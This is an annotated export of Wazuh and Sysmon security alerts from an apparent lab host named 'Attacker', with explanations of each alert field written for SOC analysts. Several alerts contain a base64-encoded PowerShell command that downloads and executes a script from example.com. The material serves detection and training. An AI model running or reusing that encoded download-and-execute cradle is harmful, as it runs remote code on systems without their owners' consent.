data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:06.564+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.564+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1251153
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:44.7394845Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283087
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:44.700 ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ProcessId: 13808 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zlhbjab1.ofo.ps1 CreationUtcTime: 2025-04-24 22:36:44.700 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:44.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zlhbjab1.ofo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:44.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.074+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1253922
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:48.9978915Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283194
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:46.080 ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ProcessId: 12224 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ParentProcessId: 13808 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:46.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.074+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1261993
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:49.2137491Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283195
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:49.197 ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ProcessId: 12224 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_haclrpxn.hq3.ps1 CreationUtcTime: 2025-04-24 22:36:49.197 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:49.197
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_haclrpxn.hq3.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:49.197
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.585+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.585+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1264762
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:51.5380699Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283230
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:50.192 ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ProcessId: 10808 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ParentProcessId: 12224 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:50.192
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

